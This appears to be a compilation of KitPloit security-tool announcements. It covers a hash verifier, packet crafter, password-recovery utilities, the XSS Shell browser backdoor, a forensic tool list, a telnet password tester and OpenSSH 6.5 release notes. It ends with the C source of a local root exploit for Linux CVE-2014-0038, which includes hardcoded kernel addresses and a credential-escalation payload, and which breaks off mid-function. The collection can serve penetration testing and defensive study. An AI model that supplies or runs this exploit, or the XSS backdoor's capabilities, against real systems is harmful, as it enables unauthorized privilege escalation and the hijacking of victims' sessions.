Channel: KitPloit - PenTest Tools!

[Download Hash Verifier] Quickly Verify Integrity (MD5/SHA256 Hash) of Downloaded File


Download Hash Verifier is a free tool to verify the integrity of a downloaded file.

It makes file hash verification easier and quicker with features such as 'Auto Hash Detection', 'Drag & Drop File' and 'Instant copy from Clipboard'.

Hash verification is a standard mechanism for checking that a downloaded file is the original and has not been tampered with. It often happens that attackers modify the files offered for download on a server and plant trojans or spyware in them.

Downloading and installing such software eventually infects your PC. To prevent this, websites generally publish the MD5 or SHA256 hash of the original file so that you can verify it after downloading. In case of any tampering with the file, the end user will notice it and can alert the website administrator.

DownloadHashVerifier is designed to make this verification task easier and faster for end users. It supports both MD5 and SHA256 hash verification so you don't have to use multiple tools, and it automatically distinguishes between MD5 and SHA256 hashes without the user having to specify which one.

It works on a wide range of platforms, from Windows XP to the latest operating system, Windows 8.
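The verification workflow described above, as an added Python example that is not the tool's own code: the published digest's hex length selects MD5 or SHA256 (the "Auto Hash Detection" idea), the file is hashed in chunks, and the comparison is constant-time. The sample file and its tampered copy are constructed inside the block.

```python
import hashlib
import hmac
import os
import tempfile
from typing import Tuple

# Hex digest length -> algorithm: 32 hex characters is MD5, 64 is SHA-256.
# This mirrors the auto-detection feature; anything else is rejected.
DIGEST_ALGOS = {32: "md5", 64: "sha256"}


def detect_algorithm(expected_hex: str) -> str:
    """Pick the hash algorithm from the length of the published digest."""
    digest = expected_hex.strip().lower()
    if not digest or any(c not in "0123456789abcdef" for c in digest):
        raise ValueError("expected digest is not hexadecimal")
    try:
        return DIGEST_ALGOS[len(digest)]
    except KeyError:
        raise ValueError(f"unsupported digest length {len(digest)}") from None


def hash_file(path: str, algorithm: str, chunk_size: int = 1 << 20) -> str:
    """Hash a file in chunks so a large download never has to fit in memory."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_download(path: str, expected_hex: str) -> Tuple[str, bool]:
    """Return (algorithm, matches). compare_digest keeps the comparison
    constant-time, so the result does not leak how many characters agreed."""
    algorithm = detect_algorithm(expected_hex)
    actual = hash_file(path, algorithm)
    return algorithm, hmac.compare_digest(actual, expected_hex.strip().lower())


def demo() -> Tuple[Tuple[str, bool], Tuple[str, bool]]:
    """Constructed sample: verify an intact file, then a modified copy."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "download.bin")
        with open(path, "wb") as f:
            f.write(b"example installer contents\n")
        published = hash_file(path, "sha256")      # what the site would publish
        intact = verify_download(path, published)
        with open(path, "ab") as f:
            f.write(b"tampered")                    # simulate a modified download
        modified = verify_download(path, published)
    return intact, modified


if __name__ == "__main__":
    print(demo())  # (('sha256', True), ('sha256', False))
```

An attacker who can replace the file on a server can usually replace the hash published beside it too, so this check mainly catches corrupted or altered transfers; a signature or a hash obtained out-of-band is needed for a stronger guarantee.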


[SPS] Simple Packet Sender



A Linux packet crafting tool. Supports IPv4, IPv6 including extension headers, and tunneling IPv6 over IPv4. Written in C on Linux with GUI built using GTK+ and released under GPLv3. Does not require pcap.

Features:

Packet crafting and sending of one, multiple, or a flood of IPv4 and IPv6 packets of type TCP, ICMP, or UDP (or cycling through all three). All values within the Ethernet frame can be modified arbitrarily. Supports IPv4 header options, TCP header options, and TCP, ICMP and UDP payload data, entered from the keyboard as UTF-8/ASCII, from the keyboard as hexadecimal, or from a file.

IPv6 support includes: hop-by-hop, "first" and "last" destination, routing, authentication, and encapsulating security payload (ESP) extension headers. For those without access to a native IPv6 network, IPv6 packets can be transmitted over IPv4 (6to4).

Packet fragmentation for IPv4, IPv6, and 6to4. Assumed maximum transmission unit (MTU) can be changed if unusual fragment sizes are needed.

IP addresses and port numbers can be randomized.

A configurable traceroute function, which supports TCP, ICMP, and UDP packets with all the features mentioned above.

View packets in hexadecimal/ASCII representation, in both unfragmented and fragmented forms.
All packet settings can be saved to and loaded from file.

IP and ASN delegation functions, including: country name/code search and reverse search, autonomous system (AS) number search by country and reverse search, IPv4 and IPv6 address delegation search and reverse search.

ARP (IPv4) and Neighbor Discovery (IPv6) for querying a LAN for MAC addresses of local nodes.
Retrieve MAC address and current MTU setting of any attached network interface.

Domain name resolution and reverse resolution.

[MailPasswordDecryptor v4.0] All-in-one eMail Password Recovery Software


Mail Password Decryptor is free software to instantly recover mail account passwords from popular email clients and other desktop applications.

You can recover your lost password for email accounts such as Gmail, Yahoo Mail, Hotmail or Windows Live Mail from email applications such as Microsoft Outlook, Thunderbird, IncrediMail, GTalk and many more.

MailPasswordDecryptor automatically crawls through each of these applications and instantly recovers all of the stored mail account passwords.

It provides both a GUI and a command line in a single program, making it useful for penetration testers as well as forensic investigators.

The current mega release supports password recovery from Outlook 2013, Windows Live Mail 2012 and Foxmail v7.x.

It works on both 32-bit and 64-bit platforms, from Windows XP to the latest operating system, Windows 8.

[Windbgshark] Windbg extension for VM traffic manipulation and analysis



This project includes an extension for the windbg debugger as well as driver code, which together allow you to manipulate the virtual machine's network traffic and to integrate the Wireshark protocol analyzer with windbg commands.

The motivation for this work came from the wish to find a handy, general-purpose way to debug network traffic flows under the Windows OS, for the purposes of dynamic software testing for vulnerabilities, for reverse engineering of software, and just for fun.

Theory of operation

The main idea is to rely on the Windows Filtering Platform's capability to inspect traffic at the application layer of the OSI model (although the method works equally well at any layer exposed by the WFP API). This gives us a way to intercept and modify any data that goes through the Windows TCP/IP stack (even localhost traffic), regardless of the application type and the transport/network protocol. Modification and reinjection also work well: the operating system does all the dirty work, reconstructing the transport and network layer headers, for example, as if we were sending the data from a user-mode Winsock application.

This tool needs a virtualized environment (it currently works fine with VMware Workstation) with windbg connected to the virtual machine as a kernel debugger. Installation is done in two steps: driver installation and extension loading in windbg. The driver intercepts network traffic, allows windbg to modify it, and then reinjects the packets back into the network stack. The extension in turn implements a simple interface for packet editing and also uses Wireshark to display the data flows. The extension is executed on the host machine, while the driver is located on the virtual machine. To interact with its driver, the windbg extension sets the corresponding breakpoints, with its own callbacks, right inside the driver code. Every time a packet comes in or goes out, a breakpoint is hit and windbgshark extracts the application-level payload of the current packet, constructs a new pcap record and sends it to Wireshark. Before the packet is reinjected, the user may modify it, and Wireshark will re-parse and show the modified record.

[Games Key Decryptor] Tool to Recover License/CD Keys of Popular Games


Games Key Decryptor is a free all-in-one tool to instantly recover license keys of popular gaming software.

It automatically detects and recovers the license/CD key of all the supported games installed on your system. Currently it supports around 50 PC games including Battlefield, Call of Duty, FIFA, NFS, Age of Empires, Quake, The Sims, Half-Life, IGI, Star Wars and many more.

After a successful recovery you can back up the CD key list to an HTML/XML/TEXT/CSV file. You can also right-click any of the displayed license keys to copy it quickly.

The new version v2.0 includes command-line support, making it suitable for automation and remote license key recovery.

It works on both 32-bit and 64-bit platforms, from Windows XP to the latest operating system, Windows 8.

[ExifTool] Read, Write Meta Information Tool

ExifTool is a platform-independent Perl library plus a command-line application for reading, writing and editing meta information in a wide variety of files. ExifTool supports many different metadata formats including EXIF, GPS, IPTC, XMP, JFIF, GeoTIFF, ICC Profile, Photoshop IRB, FlashPix, AFCP and ID3, as well as the maker notes of many digital cameras by Canon, Casio, FLIR, FujiFilm, GE, HP, JVC/Victor, Kodak, Leaf, Minolta/Konica-Minolta, Nikon, Olympus/Epson, Panasonic/Leica, Pentax/Asahi, Phase One, Reconyx, Ricoh, Samsung, Sanyo, Sigma/Foveon and Sony.


Features


  • Powerful, fast, flexible and customizable
  • Supports a large number of different file formats
  • Reads EXIF, GPS, IPTC, XMP, JFIF, MakerNotes, GeoTIFF, ICC Profile, Photoshop IRB, FlashPix, AFCP, ID3 and more...
  • Writes EXIF, GPS, IPTC, XMP, JFIF, MakerNotes, ICC Profile, Photoshop IRB, AFCP and more...
  • Reads and writes maker notes of many digital cameras
  • Decodes a riddle wrapped in a mystery inside an enigma
  • Numerous output formatting options (including tab-delimited, HTML, XML and JSON)
  • Multi-lingual output (cs, de, en, en-ca, en-gb, es, fi, fr, it, ja, ko, nl, pl, ru, sv, tr, zh-cn or zh-tw)
  • Geotags images from GPS track log files (with time drift correction!)
  • Generates track logs from geotagged images
  • Shifts date/time values to fix timestamps in images
  • Renames files and organizes in directories (by date or by any other meta information)
  • Extracts thumbnail images, preview images, and large JPEG images from RAW files
  • Copies meta information between files (even different-format files)
  • Reads/writes structured XMP information
  • Deletes meta information individually, in groups, or altogether
  • Sets the file modification date (and creation date in Windows) from EXIF information
  • Supports alternate language tags in XMP, PNG, ID3, Font, QuickTime, ICC Profile, MIE and MXF information
  • Processes entire directory trees
  • Creates text output file for each image file
  • Creates binary-format metadata-only (MIE) files for metadata backup
  • Automatically backs up original image when writing
  • Organizes output into groups
  • Conditionally processes files based on value of any meta information
  • Ability to add custom user-defined tags
  • Support for MWG (Metadata Working Group) recommendations
  • Recognizes thousands of different tags
  • Tested with images from thousands of different camera models
  • Advanced verbose and HTML-based hex dump outputs


[XSS Shell] XSS Backdoor and Zombie Manager



XSS Shell is a powerful XSS backdoor and zombie manager. The concept was first presented by XSS-Proxy (http://xss-proxy.sourceforge.net/). Normally in XSS attacks the attacker has one shot; with XSS Shell you can interactively send requests to and get responses from the victim, and you can backdoor the page.

Download

This package includes the latest version of XSS Shell and XSSTunnel. XSS Shell can be used without XSS Tunnel, however you’ll get more out of it with XSS Tunnel.
Download XSS Shell and XSS Tunnel

Features

XSS Shell has several features to gain full access over the victim. You can also simply add your own commands.
Most of the features can be enabled or disabled from the configuration or tweaked in the source code.
  • Regenerating Pages
    • This is one of the key and advanced features of XSS Shell. XSS Shell re-renders the infected page and keeps the user in a virtual environment. Thus even if the user clicks any link in the infected page, he or she will still be under control (within cross-domain restrictions). In normal XSS attacks, once the user leaves the page you can't do anything.
    • Secondly, this feature keeps the session open, so even if the victim follows an outside link from the infected page the session is not going to time out and you will still be in charge.
  • Keylogger
  • Mouse Logger (click points + current DOM)
  • Built-in Commands;
    • Get Keylogger Data
    • Get Current Page (Current rendered DOM / like screenshot)
    • Get Cookie
    • Execute supplied javaScript (eval)
    • Get Clipboard (IE only)
    • Get internal IP address (Firefox + JVM only)
    • Check victim’s visited URL history

List of Forensic Tools

MEMORY ACQUISITION AND ANALYSIS

A set of utilities for acquiring RAM so that it can be analysed afterwards.

pd Process Dumper - Dumps a process from memory to a file.
FTK Imager - Among other things, allows memory acquisition.
DumpIt - Dumps memory to a file.
Responder CE - Captures memory and allows it to be analysed.
Volatility - Analyses processes and extracts information useful to the analyst.
RedLine - Captures memory and allows it to be analysed. Has a graphical environment.
Memoryze - Captures RAM (Windows and OS X).


DISK MOUNTING

Utilities for mounting disk images or virtualising drives so that the file system can be accessed and analysed afterwards.

ImDisk - Virtual disk driver.
OSFMount - Mounts local disk images on Windows, assigning a drive letter.

raw2vmdk - Java utility that converts raw/dd images to .vmdk.

FTK Imager - Mentioned above; it also allows disk mounting.
vhdtool - Converts raw/dd images to .vhd, allowing them to be mounted from the Windows Disk Manager.
LiveView - Java utility that creates a VMware virtual machine from a disk image.
MountImagePro - Mounts local disk images on Windows, assigning a drive letter.

CARVING AND DISK TOOLS

Recovery of lost or deleted data, searching for patterns and for files with specific content such as images or videos. Partition recovery and handling of disk structures.


PhotoRec - Very useful; recovers images and video.
Scalpel - File-system independent. The files or directories to recover can be customised.
RecoverRS - Recovers URLs of visited websites and files. Carves directly from a disk image.
NTFS Recovery - Recovers data and disks even after the disk has been formatted.
Recuva - Utility for recovering deleted files.
Raid Reconstructor - Recovers data from a broken RAID, whether RAID 5 or RAID 0, even when the RAID parameters are unknown.
CNWrecovery - Recovers corrupt sectors and includes carving utilities.
Restoration - Utility for recovering deleted files.
Rstudio - Data recovery from any disk system: NTFS, NTFS5, ReFS, FAT12/16/32, exFAT, HFS/HFS+ (Macintosh), little- and big-endian UFS1/UFS2 variants (FreeBSD/OpenBSD/NetBSD/Solaris) and Ext2/Ext3/Ext4 FS partitions.
Freerecover - Utility for recovering deleted files.
DMDE - Supports FAT12/16, FAT32 and NTFS, runs on Windows 98/ME/2K/XP/Vista/7/8 (GUI and console), DOS (console) and Linux (terminal), and includes carving utilities.
IEF - Internet Evidence Finder. Carves a disk image looking for traces of more than 230 applications, such as Google chat, Facebook, iOS, RAM, virtual memory, etc.


Bulk_extractor - Extracts data from an image, folder or files.

FILE SYSTEM UTILITIES

A set of tools for analysing the data and files that are essential when investigating an incident.


analyzeMFT - David Kovar's Python utility for extracting the MFT.
MFT Extractor - Another utility for extracting the MFT.
INDXParse - Tool for indexes and the $I30 file.
MFT Tools (mft2csv, LogFileParser, etc.) - A set of utilities for accessing the MFT.
MFT_Parser - Extracts and analyses the MFT.
Prefetch Parser - Extracts and analyses the prefetch directory.
WinPrefetchView - Extracts and analyses the prefetch directory.

Fileassassin - Unlocks files locked by programs.


MALWARE ANALYSIS

PDF Tools by Didier Stevens.
PDFStreamDumper - A free tool for analysing malicious PDFs.
SWF Mastah - Python program that extracts SWF streams from PDF files.
Process Explorer - Shows process information.
Capture BAT - Monitors the activity of the system or of an executable.
Regshot - Takes registry snapshots so that the changes between them can be compared.
Bintext - Extracts ASCII strings from an executable or file.
LordPE - Tool for editing certain parts of executables and dumping the memory of running processes.
Firebug - Web application analysis.
IDA Pro - Application debugger.
OllyDbg - Disassembler and debugger for applications or processes.
Jsunpack-n - Emulates browser functionality when visiting a URL. Its purpose is exploit detection.
OfficeMalScanner - A forensic tool whose purpose is to find malicious programs or files in Office documents.
Radare - Reverse engineering framework.
FileInsight - Reverse engineering framework.
Volatility Framework with the malfind2 and apihooks plugins.
shellcode2exe - Converts shellcode into binaries.


FRAMEWORKS


A standardised set of concepts, practices and criteria on which the forensic analysis of a case is based.

PTK - Searches files, generates hashes, provides rainbow tables. Analyses data from an already mounted disk.
Log2timeline - A framework for automatically creating a super timeline.
Plaso - Evolution of Log2timeline. Framework for automatically creating a super timeline.

OSForensics - Searches files, generates hashes, provides rainbow tables. Analyses data from an already mounted disk.
DFF - Framework with a graphical environment for analysis.
SANS SIFT Workstation - Magnificent appliance from SANS. I use it very often.
Autopsy - Very complete. Fully rewritten in Java for Windows. Very useful.

WINDOWS REGISTRY ANALYSIS

Obtains data from the registry such as users, permissions, executed files, system information, IP addresses and application information.


RegRipper - An application for extracting, correlating and displaying registry information.
WRR - Graphically obtains system, user and application data from the registry.

Shellbag Forensics - Analysis of Windows shellbags.
Registry Decoder - Extracts and correlates registry data, even while the machine is running.



NETWORK TOOLS

Everything related to network traffic: looking for anomalous patterns, malware, suspicious connections, attack identification, etc.


Wireshark - Tool for capturing and analysing network packets.
NetworkMiner - Forensic tool for discovering network information.
Netwitness Investigator - Forensic tool. The 'free edition' is limited to 1 GB of traffic.
Network Appliance Forensic Toolkit - Set of utilities for network acquisition and analysis.
Xplico - Extracts all the data content from network traffic (a pcap file or live acquisition). It can extract every e-mail carried over the POP and SMTP protocols and all content transferred over HTTP.
Snort - Intrusion detector. Allows packet capture and analysis.
Splunk - The engine for the data and logs generated by devices, workstations and servers. It indexes and exploits the data generated by all IT systems and infrastructure, whether physical, virtual or in the cloud.
AlienVault - Like Splunk, collects data and logs and applies an intelligence layer to them for detecting anomalies, intrusions or security policy failures.

PASSWORD RECOVERY

Everything related to password recovery on Windows: by brute force, in forms, in browsers.


Ntpwedit - A password editor for Windows NT-based systems (such as Windows 2000, XP, Vista, 7 and 8); it can change or remove the passwords of local system accounts. Not valid for Active Directory.
Ntpasswd - A password editor for Windows-based systems; the utility can be started from a live CD.
pwdump7 - Dumps the hashes. It works by extracting the SAM binaries.
SAMInside / OphCrack / L0phtcrack - Dump the hashes. Include dictionaries for brute-force attacks.



MOBILE DEVICES

This section has a set of utilities and tools for data recovery and forensic analysis of mobile devices. I have included commercial tools since I use some of them and consider them very interesting and important.


iPhone

iPhoneBrowser - Accesses the iPhone file system from a graphical environment.
iPhone Analyzer - Explores the iPhone's internal file structure.
iPhoneBackupExtractor - Extracts files from a previously made backup.
iPhone Backup Browser - Extracts files from a previously made backup.
iPhone-Dataprotection - Contains tools for creating a forensic RAM disk, brute-forcing simple (4-digit) passcodes and decrypting backups.
iPBA2 - Accesses the iPhone file system from a graphical environment.

sPyphone - Explores the internal file structure.

BlackBerry

Blackberry Desktop Manager - Data and backup management software.
Phoneminer - Extracts, views and exports data from backup files.
Blackberry Backup Extractor - Extracts, views and exports data from backup files.

MagicBerry - Can read, convert and extract the IPD database.

Android

android-locdump - Obtains geolocation data.

androguard - Obtains, modifies and disassembles DEX/ODEX/APK/AXML/ARSC formats.
viaforensics - Framework of utilities for forensic analysis.

Osaf - Framework of utilities for forensic analysis.

COMMERCIAL PRODUCTS

They could not be left out. Having these tools is wonderful, and being able to use them a luxury. Fast and concise. The worst thing about some of them is the price.


[Lazy-Kali] Bash Script for Kali Linux


A bash script for when you feel lazy.
Adds quite a few tools to Kali Linux.
  • Bleeding Edge Repos
  • AngryIP Scanner
  • Terminator
  • Xchat
  • Unicornscan
  • Nautilus Open Terminal
  • Simple-Ducky
  • Subterfuge
  • Ghost-Phisher
  • Yamas
  • PwnStar
  • Ettercap0.7.6
  • Xssf
  • Smbexec
  • Flash
  • Java
  • Easy-Creds
... and more!
Lazy-Kali will also update Kali, start Metasploit services, and start, stop and update OpenVAS.

[EtherApe] A graphical network monitor


EtherApe is a graphical network monitor for Unix modeled after etherman. Featuring link layer, IP and TCP modes, it displays network activity graphically. Hosts and links change in size with traffic, and protocols are displayed colour-coded.

It supports Ethernet, FDDI, Token Ring, ISDN, PPP, SLIP and WLAN devices, plus several encapsulation formats. It can filter traffic to be shown, and can read packets from a file as well as live from the network. Node statistics can be exported.


Overview of changes in EtherApe 0.9.13:


Central node option, useful for displaying routers or proxies.
Translations and documentation updates, plus some fixes.

OpenSUSE build service now provides binary packages for Fedora 17 and 18 and SLES 11 SP2.
Changes summary:
  • Optional central node, based on work by Javier Fernandez-Sanguino Peña.
  • Re-enabled full-screen mode, thanks to nrvale0.
  • Updated Spanish translation, thanks to Javier Fernandez-Sanguino Peña.
  • Added German translation and fixed typos, thanks to Chris Leick.
  • Updated documentation.

[PACK] Password Analysis & Cracking Kit



PACK (Password Analysis and Cracking Toolkit) is a collection of utilities developed to aid in the analysis of password lists in order to enhance password cracking through pattern detection of masks, rules, character sets and other password characteristics. The toolkit generates valid input files for the Hashcat family of password crackers.

NOTE: The toolkit itself is not able to crack passwords, but is instead designed to make the operation of password crackers more efficient.

[Lynis 1.4.0] Security and System Auditing Tool to Harden Linux Systems



Lynis is an auditing tool for Unix/Linux. It performs a security scan and determines the hardening state of the machine. Any detected security issues are reported in the form of a suggestion or warning. Besides security-related information it also scans for general system information, installed packages and possible configuration errors.

This software aims to assist automated auditing, hardening, software patch management, and vulnerability and malware scanning of Unix/Linux based systems. It can be run without prior installation, so inclusion on read-only storage (USB stick, CD/DVD) is possible.

Lynis assists auditors in performing Basel II, GLBA, HIPAA, PCI DSS and SOx (Sarbanes-Oxley) compliance audits.

Intended audience: security specialists, penetration testers, system auditors, system/network managers.

Examples of audit tests:
  • Available authentication methods
  • Expired SSL certificates
  • Outdated software
  • User accounts without password
  • Incorrect file permissions
  • Configuration errors
  • Firewall auditing

[TYFYP] Massive Telnet Password Tester



Commercial name: TYFYP (Thank you for your password), in honour of the ADTRAN telnet banner motd welcome message.

Please use it ONLY on LAN IPs. This is a very rudimentary program, only for investigation purposes. Developed on a Retina Display machine, so there may be UI errors on normal-resolution screens.

REQUIREMENTS:

  • Windows.
  • .NET Framework v4.5

HOW TO USE:

  • Open TYFYP.exe or compile it in Visual Studio.
  • Select a .txt file with the list of IPs you want to try.
  • Enter a default telnet username, password and enable password.
  • Click "Run".

WHAT IT WILL DO:

  • Checks the telnet username and password IP by IP.
  • If there is a connection, it will try the enable password.
  • You will see green lines in case of a successful connection, red lines if not.
  • Clear red lines mean there was no telnet service listening (or your network connection failed).

FUTURE IMPROVEMENTS:

  • Be able to read the telnet user, password and enable password directly from the IP list txt. This will allow trying multiple passwords for each IP.
  • Make it multi-threaded.

[OpenSSH 6.5] FREE version of the SSH Connectivity Tools



OpenSSH is a FREE version of the SSH connectivity tools that technical users of the Internet rely on. Users of telnet, rlogin, and ftp may not realize that their password is transmitted across the Internet unencrypted, but it is. OpenSSH encrypts all traffic (including passwords) to effectively eliminate eavesdropping, connection hijacking, and other attacks. Additionally, OpenSSH provides secure tunneling capabilities and several authentication methods, and supports all SSH protocol versions.

The OpenSSH suite replaces rlogin and telnet with the ssh program, rcp with scp, and ftp with sftp. Also included are sshd (the server side of the package) and other utilities such as ssh-add, ssh-agent, ssh-keysign, ssh-keyscan, ssh-keygen and sftp-server.

OpenSSH is developed by the OpenBSD Project. The software is developed in countries that permit cryptography export and is freely usable and re-usable by everyone under a BSD license. However, development has costs, so if you find OpenSSH useful (particularly if you use it in a commercial system that is distributed) please consider donating to help fund the project.

OpenSSH is developed by two teams. One team does strictly OpenBSD-based development, aiming to produce code that is as clean, simple, and secure as possible. We believe that simplicity without the portability "goop" allows for better code quality control and easier review. The other team then takes the clean version and makes it portable (adding the "goop") to make it run on many operating systems: the so-called -p releases, i.e. "OpenSSH 4.0p1".

Changes since OpenSSH 6.4
=========================

This is a feature-focused release.

New features:

* ssh(1), sshd(8): Add support for key exchange using elliptic-curve
Diffie Hellman in Daniel Bernstein's Curve25519. This key exchange
method is the default when both the client and server support it.

* ssh(1), sshd(8): Add support for Ed25519 as a public key type.
Ed25519 is an elliptic curve signature scheme that offers
better security than ECDSA and DSA and good performance. It may be
used for both user and host keys.

* Add a new private key format that uses a bcrypt KDF to better
protect keys at rest. This format is used unconditionally for
Ed25519 keys, but may be requested when generating or saving
existing keys of other types via the -o ssh-keygen(1) option.
We intend to make the new format the default in the near future.
Details of the new format are in the PROTOCOL.key file.

* ssh(1), sshd(8): Add a new transport cipher
"chacha20-poly1305@openssh.com" that combines Daniel Bernstein's
ChaCha20 stream cipher and Poly1305 MAC to build an authenticated
encryption mode. Details are in the PROTOCOL.chacha20poly1305 file.

* ssh(1), sshd(8): Refuse RSA keys from old proprietary clients and
servers that use the obsolete RSA+MD5 signature scheme. It will
still be possible to connect with these clients/servers but only
DSA keys will be accepted, and OpenSSH will refuse connection
entirely in a future release.

* ssh(1), sshd(8): Refuse old proprietary clients and servers that
use a weaker key exchange hash calculation.

* ssh(1): Increase the size of the Diffie-Hellman groups requested
for each symmetric key size. New values from NIST Special
Publication 800-57 with the upper limit specified by RFC4419.

* ssh(1), ssh-agent(1): Support PKCS#11 tokens that only provide
X.509 certs instead of raw public keys (requested as bz#1908).

* ssh(1): Add a ssh_config(5) "Match" keyword that allows
conditional configuration to be applied by matching on hostname,
user and result of arbitrary commands.

* ssh(1): Add support for client-side hostname canonicalisation
using a set of DNS suffixes and rules in ssh_config(5). This
allows unqualified names to be canonicalised to fully-qualified
domain names to eliminate ambiguity when looking up keys in
known_hosts or checking host certificate names.

* sftp-server(8): Add the ability to whitelist and/or blacklist sftp
protocol requests by name.

* sftp-server(8): Add an sftp "fsync@openssh.com" extension to support calling
fsync(2) on an open file handle.

* sshd(8): Add a ssh_config(5) PermitTTY to disallow TTY allocation,
mirroring the longstanding no-pty authorized_keys option.

* ssh(1): Add a ssh_config ProxyUseFDPass option that supports the
use of ProxyCommands that establish a connection and then pass a
connected file descriptor back to ssh(1). This allows the
ProxyCommand to exit rather than staying around to transfer data.

Bugfixes:

* ssh(1), sshd(8): Fix potential stack exhaustion caused by nested
certificates.

* ssh(1): bz#1211: make BindAddress work with UsePrivilegedPort.

* sftp(1): bz#2137: fix the progress meter for resumed transfer.

* ssh-add(1): bz#2187: do not request smartcard PIN when removing
keys from ssh-agent.

* sshd(8): bz#2139: fix re-exec fallback when original sshd binary
cannot be executed.

* ssh-keygen(1): Make relative-specified certificate expiry times
relative to current time and not the validity start time.

* sshd(8): bz#2161: fix AuthorizedKeysCommand inside a Match block.

* sftp(1): bz#2129: symlinking a file would incorrectly canonicalise
the target path.

* ssh-agent(1): bz#2175: fix a use-after-free in the PKCS#11 agent
helper executable.

* sshd(8): Improve logging of sessions to include the user name,
remote host and port, the session type (shell, command, etc.) and
allocated TTY (if any).

* sshd(8): bz#1297: tell the client (via a debug message) when
their preferred listen address has been overridden by the
server's GatewayPorts setting.

* sshd(8): bz#2162: include report port in bad protocol banner
message.

* sftp(1): bz#2163: fix memory leak in error path in do_readdir().

* sftp(1): bz#2171: don't leak file descriptor on error.

* sshd(8): Include the local address and port in "Connection from
..." message (only shown at loglevel>=verbose).

Portable OpenSSH:

* Please note that this is the last version of Portable OpenSSH that
will support versions of OpenSSL prior to 0.9.6. Support (i.e.
SSH_OLD_EVP) will be removed following the 6.5p1 release.

* Portable OpenSSH will attempt to compile and link as a Position
Independent Executable on Linux, OS X and OpenBSD on recent gcc-
like compilers. Other platforms and older/other compilers may
request this using the --with-pie configure flag.

* A number of other toolchain-related hardening options are used
automatically if available, including -ftrapv to abort on signed
integer overflow and options to write-protect dynamic linking
information. The use of these options may be disabled using the
--without-hardening configure flag.

* If the toolchain supports it, one of the -fstack-protector-strong,
-fstack-protector-all or -fstack-protector compilation flags is
used to add guards that mitigate attacks based on stack overflows.
The use of these options may be disabled using the
--without-stackprotect configure option.

* sshd(8): Add support for pre-authentication sandboxing using the
Capsicum API introduced in FreeBSD 10.

* Switch to a ChaCha20-based arc4random() PRNG for platforms that do
not provide their own.

* sshd(8): bz#2156: restore Linux oom_adj setting when handling
SIGHUP to maintain behaviour over restart.

* sshd(8): bz#2032: use local username in krb5_kuserok check rather
than full client name which may be of form user@REALM.

* ssh(1), sshd(8): Test for both the presence of ECC NID numbers in
OpenSSL and that they actually work. Fedora (at least) has
NID_secp521r1 that doesn't work.

* bz#2173: use pkg-config --libs to include correct -L location for
libedit.

Exploit Linux 3.4+ Arbitrary write with CONFIG_X86_X32


CVE: 2014-0038
Author: saelo
Published: 2014-02-02

/*
* Local root exploit for CVE-2014-0038.
*
* https://raw.github.com/saelo/cve-2014-0038/master/timeoutpwn.c
*
* Bug: The X86_X32 recvmmsg syscall does not properly sanitize the timeout pointer
* passed from userspace.
*
* Exploit primitive: Pass a pointer to a kernel address as timeout for recvmmsg,
* if the original byte at that address is known it can be overwritten
* with known data.
* If the least significant byte is 0xff, waiting 255 seconds will turn it into a 0x00.
*
* Restrictions: The first long at the passed address (tv_sec) has to be positive
* and the second long (tv_nsec) has to be smaller than 1000000000.
*
* Overview: Target the release function pointer of the ptmx_fops structure located in
* non initialized (and thus writable) kernel memory. Zero out the three most
* significant bytes and thus turn it into a pointer to an address mappable in
* user space.
* The release pointer is used as it is followed by 16 0x00 bytes (so the tv_nsec
* is valid).
* Open /dev/ptmx, close it and enjoy.
*
* Not very beautiful but should be fairly reliable if symbols can be resolved.
*
* Tested on Ubuntu 13.10
*
* gcc timeoutpwn.c -o pwn && ./pwn
*
* Written by saelo
*/
#define _GNU_SOURCE
#include <netinet/ip.h>
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <sys/mman.h>

#define __X32_SYSCALL_BIT 0x40000000
#undef __NR_recvmmsg
#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)

#define BUFSIZE 200
#define PAYLOADSIZE 0x2000
#define FOPS_RELEASE_OFFSET 13*8

/*
* Adapt these addresses for your need.
* see /boot/System.map* or /proc/kallsyms
* These are the offsets from ubuntu 3.11.0-12-generic.
*/
#define PTMX_FOPS 0xffffffff81fb30c0LL
#define TTY_RELEASE 0xffffffff8142fec0LL
#define COMMIT_CREDS 0xffffffff8108ad40LL
#define PREPARE_KERNEL_CRED 0xffffffff8108b010LL

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);

/*
* Match signature of int release(struct inode*, struct file*).
*
* See here: http://grsecurity.net/~spender/exploits/enlightenment.tgz
*/
int __attribute__((regparm(3)))
kernel_payload(void* foo, void* bar)
{
_commit_creds commit_creds = (_commit_creds)COMMIT_CREDS;
_prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED;

*((int*)(PTMX_FOPS + FOPS_RELEASE_OFFSET + 4)) = -1; // restore pointer
commit_creds(prepare_kernel_cred(0));

return -1;
}

/*
* Write a zero to the byte at the given address.
* Only works if the current value is 0xff.
*/
void zero_out(long addr)
{
int sockfd, retval, port, pid, i;
struct sockaddr_in sa;
char buf[BUFSIZE];
struct mmsghdr msgs;
struct iovec iovecs;

srand(time(NULL));

port = 1024 + (rand() % (0x10000 - 1024));

sockfd = socket(AF_INET, SOCK_DGRAM, 0);
if (sockfd == -1) {
perror("socket()");
exit(EXIT_FAILURE);
}

sa.sin_family = AF_INET;
sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
sa.sin_port = htons(port);
if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
perror("bind()");
exit(EXIT_FAILURE);
}

memset(&msgs, 0, sizeof(msgs));
iovecs.iov_base = buf;
iovecs.iov_len = BUFSIZE;
msgs.msg_hdr.msg_iov = &iovecs;
msgs.msg_hdr.msg_iovlen = 1;

/*
* start a separate process to send a udp message after 255 seconds so the syscall returns,
* but only after updating the timeout struct and writing the remaining time into it.
* 0xff - 255 seconds = 0x00
*/
printf("clearing byte at 0x%lx\n", addr);
pid = fork();
if (pid == 0) {
memset(buf, 0x41, BUFSIZE);

if ((sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) {
perror("socket()");
exit(EXIT_FAILURE);
}

sa.sin_family = AF_INET;
